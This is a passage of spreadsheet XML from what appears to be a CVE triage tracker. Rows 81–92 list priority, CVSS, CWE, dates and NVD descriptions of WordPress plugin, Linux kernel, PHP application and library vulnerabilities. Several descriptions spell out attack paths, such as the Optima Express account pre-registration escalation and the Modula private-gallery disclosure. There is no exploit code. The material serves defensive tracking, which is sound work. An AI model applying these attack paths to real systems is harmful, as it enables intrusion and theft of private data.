      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>The Modula Image Gallery – Photo Grid &amp; Video Gallery plugin for WordPress is vulnerable to unauthorized disclosure of private gallery contents in versions up to, and including, 3.0.1. This is due to the Modula_Meta::add_metas() function being hooked to wp_head on every frontend request and looking up any post via get_post( $_GET['modula_gallery_id'] ) without verifying the gallery's post_status or the requester's capability to read it — the gallery-side input guard is bugged (empty('modula_gallery_id') tests a nonempty string literal instead of the GET parameter, so it is always false), the only object validation is a post_type === 'modula-gallery' check, and no is_user_logged_in()/current_user_can('read_post', $gallery_id) check is performed. This makes it possible for unauthenticated attackers to enumerate private modula-gallery posts and their member attachments and recover the image's title, description, dimensions, and original upload URL via Open Graph/Twitter meta tags emitted in the response, which then allows direct unauthenticated download of the original private image bytes.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89406</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97595</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr"/>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mac802154: fix use-after-free of sdata via queued RX frames
The RX softirq producer ieee802154_subif_frame() queues received beacon
and MAC-command frames onto local-&gt;rx_beacon_list / rx_mac_cmd_list and
schedules a process-context worker, storing a raw mac_pkt-&gt;sdata (and
skb-&gt;dev == sdata-&gt;dev) with neither a reference nor any locking:
 - the lists have no lock: the softirq producer list_add_tail()s while the
   mac_wq worker list_del()s, so sibling interfaces on the same phy corrupt
   the list;
 - the workers dereference the interface after it may have been freed.
   mac802154_rx_mac_cmd_worker() touches mac_pkt-&gt;sdata directly, and
   mac802154_rx_beacon_worker() -&gt; mac802154_process_beacon() dereferences
   skb-&gt;dev (== sdata-&gt;dev). Removing an interface frees its sdata
   (netdev_priv) while a queued frame still points at it, so a later worker
   run is a use-after-free.
Reproduced under KASAN by flooding a victim interface with MAC command
frames and removing it (the beacon path is the same class via skb-&gt;dev):
  BUG: KASAN: slab-use-after-free in mac802154_rx_mac_cmd_worker+0x463/0x630 [mac802154]
  Read of size 4 at addr ffff888002f9ea18 by task kworker/u8:1/31
  Workqueue: phy0-mac-cmds mac802154_rx_mac_cmd_worker [mac802154]
  Call Trace:
   mac802154_rx_mac_cmd_worker+0x463/0x630 [mac802154]
   process_one_work+0x611/0xe80
   worker_thread+0x52e/0xdc0
   kthread+0x30c/0x630
   ret_from_fork+0x2fd/0x3e0
Fix both lists together:
 - add local-&gt;rx_lock and take it around every list access: the softirq
   producer (plain spin_lock, softirq context) and the workers and flush
   (spin_lock_bh, process context);
 - pin the interface for the lifetime of a queued frame with
   netdev_hold()/netdev_put(), so the worker can safely dereference sdata /
   skb-&gt;dev even while the interface is being removed;
 - dequeue under the lock at the head and loop-drain the whole list in the
   workers (they previously processed one frame per run and relied on a
   later enqueue to drain the rest);
 - drop not-yet-started frames of an interface before it is unregistered,
   from ieee802154_if_remove() (after the RCU grace period) and from the
   ieee802154_remove_interfaces() loop -- the latter is the whole-phy
   teardown path, which does not go through ieee802154_if_remove().
An in-flight worker that already dequeued a frame keeps its own netdev
reference; unregister_netdevice() then waits it out in netdev_run_todo(),
which runs at rtnl_unlock() (rtnl released) and after the interface has
been closed, so it does not pin rtnl. A worker blocked in an association
TX only delays that one interface's unregister (the usual "waiting for %s
to become free"), it does not hold rtnl. netdev_hold() is used for this
reason instead of a cancel_work_sync() under rtnl, which would block on
the worker's unbounded MLME TX wait via ieee802154_sync_queue().
The mac-command worker additionally skips processing for a stopped
interface (ieee802154_sdata_running()), avoiding a needless association
response during teardown.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97595</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98050</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr"/>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_ptp: Fix napi_gro_receive() call from GC workqueue context
Currently mlxsw_sp1_ptp_ht_gc_collect() is run from the PTP
garbage-collection workqueue, rather than the NAPI poll context. For any
unmatched PTP entries carrying an SKB, it calls
mlxsw_sp1_ptp_unmatched_finish() -&gt; mlxsw_sp1_ptp_packet_finish(). For
ingress packets, this calls mlxsw_sp_rx_listener_no_mark_func(). The end
of that function is the following:
    skb-&gt;protocol = eth_type_trans(skb, skb-&gt;dev);
    napi_gro_receive(mlxsw_skb_cb(skb)-&gt;rx_md_info.napi, skb);
The napi pointer is one that was placed in the SKB control block when the
trapped packet was received in the NAPI context. Later, when the GC reaps
the unmatched entry (up to MLXSW_SP1_PTP_HT_GC_TIMEOUT later), the call to
napi_gro_receive() mutates the NAPI instance's GRO list, which is unsafe
if the poll is running concurrently on another CPU.
In mlxsw_sp1_ptp_ht_gc_collect(), local_bh_disable() is called to prevent
softirq processing, but this only applies to the local CPU. Additionally,
its comment is stale. It states that mlxsw_sp1_ptp_unmatched_finish()
invokes netif_receive_skb(). This has not been accurate since the
referenced commit; this patch makes that comment accurate again.
mlxsw_pci_napi_devs_init() calls netif_threaded_enable() on the NAPI RX
net_device without any conditions. The NAPI instance's poll, which may be
running concurrent to the GC, is running as an independently-scheduled
kthread which may be on a different CPU. The call to local_bh_disable()
does not guard against this.
If a tx-timestamp timeout produces an unmatched entry (which can be easily
reproduced by running ptp4l and waiting for a port to reach the
UNCALIBRATED/SLAVE state) while the owning NAPI thread is in the middle of
a poll on another CPU, both sides mutate the GRO list concurrently, as
shown below:
  [39.846] port 1 (swp1): MASTER to UNCALIBRATED on RS_SLAVE
  list_add corruption. next-&gt;prev should be prev (ffff8d620faf4138), but was ffff8d624150f700. (next=ffff8d620faf4138).
  kernel BUG at lib/list_debug.c:29!
  Oops: invalid opcode: 0000 [#1] SMP PTI
  CPU: 1 UID: 0 PID: 539 Comm: napi/mlxsw_rx-0 Not tainted 6.18.48 #1-NixOS PREEMPT(lazy)
  Hardware name: Mellanox Technologies Ltd. MSN2410/VMOD0001, BIOS 4.6.5 09/13/2018
  RIP: 0010:__list_add_valid_or_report+0x79/0xb0
  RSP: 0018:ffffcdf8c0f27c08 EFLAGS: 00010246
  RAX: 0000000000000075 RBX: ffff8d624150fd00 RCX: 0000000000000000
  RDX: 0000000000000000 RSI: 0000000000000001 RDI: ffff8d6315d1e540
  RBP: ffff8d620faf4070 R08: 0000000000000000 R09: 00000000ffffdfff
  R10: ffffffffa5c60fe0 R11: ffffcdf8c0f27ab8 R12: 0000000000000003
  R13: 000000000000003d R14: 00000000000001bc R15: 0000000000000001
  FS:  0000000000000000(0000) GS:ffff8d636f63f000(0000) knlGS:0000000000000000
  CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
  CR2: 0000562689a60c24 CR3: 000000015f224004 CR4: 00000000001726f0
  Call Trace:
  &lt;TASK&gt;
  gro_receive_skb+0xee/0x230
  mlxsw_sp1_ptp_got_packet+0x61/0x140 [mlxsw_spectrum]
  mlxsw_core_skb_receive+0xdf/0x1b0 [mlxsw_core]
  mlxsw_pci_napi_poll_cq_rx+0x780/0x9d0 [mlxsw_pci]
  __napi_poll+0x31/0x1e0
  napi_threaded_poll_loop+0x16b/0x1c0
  napi_threaded_poll+0x71/0xa0
  kthread+0xfb/0x260
  ret_from_fork+0x22d/0x260
  ret_from_fork_asm+0x1a/0x30
  &lt;/TASK&gt;
  Kernel panic - not syncing: Fatal exception in interrupt
The machinery that leads to this kernel panic has not been changed between
6.18.48 and mainline.
This patch adds an ingress-delivery helper for the PTP packet_finish()
path that calls netif_receive_skb() instead of napi_gro_receive().
netif_receive_skb(), unlike napi_gro_receive(), can be called from outside
of the NAPI instance's poll context, which can occur at the call site for
this path. RX stats accounting and the skb-&gt;dev assignment are still
preserved; the only change is the delivery call itself.
This removes GR
---truncated---</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98050</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100310</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>GNU libextractor before 1.16 loads plugins from an untrusted search path specified by the LIBEXTRACTOR_PREFIX environment variable without proper privilege checks. A local attacker can exploit this by setting LIBEXTRACTOR_PREFIX to a directory containing a malicious plugin that executes arbitrary code with elevated privileges when loaded by a setuid or setgid program.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100310</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93901</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>php, express, gin, hp</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>The Optima Express IDX plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 8.7.5. This is due to the `provisionBlogCredentials()` function in `iHomefinderAdmin.php` being reachable via the `wp_ajax_nopriv_ihf_clear_cache` AJAX action — through the call chain `iHomefinderAjaxHandler::clearCache()` → `activateAuthenticationToken()` → `getAuthenticationInfo()` → `provisionBlogCredentials()` — with no capability check, nonce verification, or ownership validation, and the function unconditionally calling `$user-&gt;set_role('author')` on whichever WordPress account matches the hard-coded login `optima-express` via `get_user_by('login', 'optima-express')`. This makes it possible for unauthenticated attackers to escalate a pre-registered `optima-express` account to the Author role, gaining `publish_posts`, `upload_files`, and `edit_published_posts` capabilities, including access to the plugin's own `/wp-json/optima-express/v1/blog-post` REST endpoint. Exploitation requires open user registration to be enabled on the target site, and the attacker must register the `optima-express` username before the plugin has had the opportunity to provision that login for its own integration account.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93901</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97865</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-502</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Open-Web-Analytics up to 1.8.1. Affected is the function Event::loadFromArray of the file queue.php of the component Remote Event Queue Endpoint. Performing a manipulation results in deserialization. The attack can be initiated remotely. Upgrading to version 1.8.2 is able to address this issue. The patch is named 78c1222ec0e2119d84684032da1541120a2cdd23. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97865</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97882</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. The impacted element is an unknown function of the file loginlinkfaculty.php of the component Faculty Authentication. Executing a manipulation of the argument fid/pass can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97882</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97883</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. This affects an unknown function of the file updatequery.php. The manipulation of the argument gid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97883</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97885</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. Affected is an unknown function of the file updatefaculty.php. This manipulation of the argument fid causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97885</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100372</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>ClipBucket v5 before 5.5.3-#197 contains a path traversal vulnerability in the admin template editor that allows authenticated administrators to overwrite PHP files by supplying directory traversal sequences in the folder parameter. Attackers with manage_template_access permission can traverse outside the layout directory to modify executable PHP files and achieve remote code execution as the web server user.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100372</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33639</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane interpolates the administrator-controlled tax_rate_decimal_places setting into an ALTER TABLE statement for ip_tax_rates in Settings::index() without strict integer validation. A crafted setting value can add clauses to the schema-changing statement and remove or alter required database columns. The resulting schema corruption can permanently modify financial data structures and make the application unavailable. This vulnerability is fixed in 1.7.2.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33639</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42323</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr">
        <is>
          <t>php, express, go, hp</t>
        </is>
      </c>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, admin/batch_manager.php accepts administrator-controlled dimension width, height, and ratio values and filesize values from the Batch Manager filter URL without numeric validation. The URL filter parser stores those values in the bulk_manager_filter session state, and later query construction concatenates them into SQL predicates, unlike the validated POST filter path. An authenticated administrator can use crafted filter values to execute time-based or other SQL expressions and potentially disclose, modify, or disrupt database data. This issue is fixed in version 16.4.0.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42323</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
